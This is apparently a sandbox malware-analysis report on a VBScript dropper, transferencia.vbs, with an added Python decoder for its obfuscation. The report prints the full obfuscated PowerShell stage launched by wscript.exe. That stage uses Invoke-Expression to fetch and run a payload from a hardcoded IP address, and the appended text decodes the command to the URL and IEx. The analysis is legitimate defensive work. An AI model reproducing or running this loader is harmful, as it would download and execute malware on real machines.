Source: transferencia.vbs |
Virustotal: Detection: 14% |
Source: Submitted Sample |
Integrated Neural Analysis Model: Matched 98.6% probability |
Source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp |
Binary string: C:\Windows\System.pdbpdbtem.pdb |
Source: wscript.exe, 00000000.00000003.2053986258.0000021294821000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045877123.0000021294621000.00000004.00000020.00020000.00000000.sdmp |
Binary string: notepad.pdbGCTL |
Source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb |
Source: powershell.exe, 00000002.00000002.3349546170.000001BF32E29000.00000004.00000020.00020000.00000000.sdmp |
Binary string: ion.pdb |
Source: powershell.exe, 00000002.00000002.3350719704.000001BF33118000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdblz[ |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: global traffic |
HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1CA44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C6D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C628000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://91.109.20.161 |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1CA44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C6EB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://91.109.20.161( |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://91.109.20.161/Hestebremsen.chmP |
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AC33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1AA81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1AA81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1B878000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AC33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. 
ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer |
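The PowerShell command line above is the second stage that wscript.exe spawns. Every string literal handed to Opbrugets52 is padded with four junk characters (fragments of Danish words) in front of each real character, and the function keeps positions 4, 9, 14, ... and drops the final padding character whenever $host.PrivateData is non-null. The block below is an added example, not code from the report or from the sample: it ports that decoder to Python and runs it over literals copied verbatim from the command line. The constant names, the decode_script helper and the constructed SAMPLE_FRAGMENT are mine; the decoding rule is the sample's own.

```python
import re

# Added example (not code from the report or from the sample): a Python port
# of the sample's own string decoder, Opbrugets52, so that the obfuscated
# PowerShell command line in the process-creation row can be decoded offline.


def decode_every_fifth(blob: str, host_has_private_data: bool = True) -> str:
    """Port of the sample's Opbrugets52 function.

    Stripped of its junk comments, the PowerShell original does:
        If ($host.PrivateData) { $Navicert++ }         # 1 in a normal console host
        $end = $blob.Length - $Navicert
        for ($i = 4; $i -lt $end; $i += 5) { $out += $blob[$i] }
    so the payload sits at indices 4, 9, 14, ... and the trailing padding
    character is dropped only when $host.PrivateData is non-null. In a host
    where it is $null the decoded strings keep that extra character.
    """
    end = len(blob) - (1 if host_has_private_data else 0)
    return "".join(blob[i] for i in range(4, end, 5))


# Literals copied verbatim from the report's command line; the variable names
# are the sample's own.
UGENUMMER = " An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage "
TOPOGRAPHOMETRIC = "BangIMa mE skuxKalk "
BILLARDKUGLE = "Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete "
FIRST_STATEMENT = "bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest "

# Matches each call of the decoder with a single-quoted literal argument.
_CALL_RE = re.compile(r"Opbrugets52 '([^']*)'")


def decode_script(script: str) -> list[str]:
    """Decode every Opbrugets52 '<blob>' literal found in a script fragment, in order.

    Only literals passed directly to the decoder are handled; the sample also
    builds strings by concatenating decoded pieces, which this does not follow.
    """
    return [decode_every_fifth(m.group(1)) for m in _CALL_RE.finditer(script)]


# Constructed fragment in the sample's own syntax, assembled from the four
# literals above (the real command line on the page is truncated).
SAMPLE_FRAGMENT = (
    f"$Topographometric=Opbrugets52 '{TOPOGRAPHOMETRIC}';"
    f"$Ugenummer=Opbrugets52 '{UGENUMMER}';"
    f"$billardkugle=Opbrugets52 '{BILLARDKUGLE}';"
    f"ggepuncherne (Opbrugets52 '{FIRST_STATEMENT}');"
)

if __name__ == "__main__":
    for decoded in decode_script(SAMPLE_FRAGMENT):
        print(decoded)
```

Run stand-alone, the block prints IEx, http://91.109.20.161/Hestebremsen.chm, USEr-aGent and $global:Indkopiering=$env:appdata+$Garwin. That ties the rows of the report together: $Topographometric is the Invoke-Expression alias, so ggepuncherne is `& IEx` over each decoded statement; $Ugenummer is the hardcoded-IP URL behind the GET /Hestebremsen.chm rows and the "TCP traffic without corresponding DNS query" row; $billardkugle is the header name for the Firefox 121 User-Agent seen in the HTTP rows; and the first executed statement builds a path under %APPDATA% from $Garwin='\Dorgens.Uns'. The User-Agent literal ($Postnarisnertion254) decodes by the same rule, but the report text has collapsed a whitespace run inside it, so it cannot be reproduced exactly from this page, and the command line itself is cut off before the statements that fetch and use the .chm.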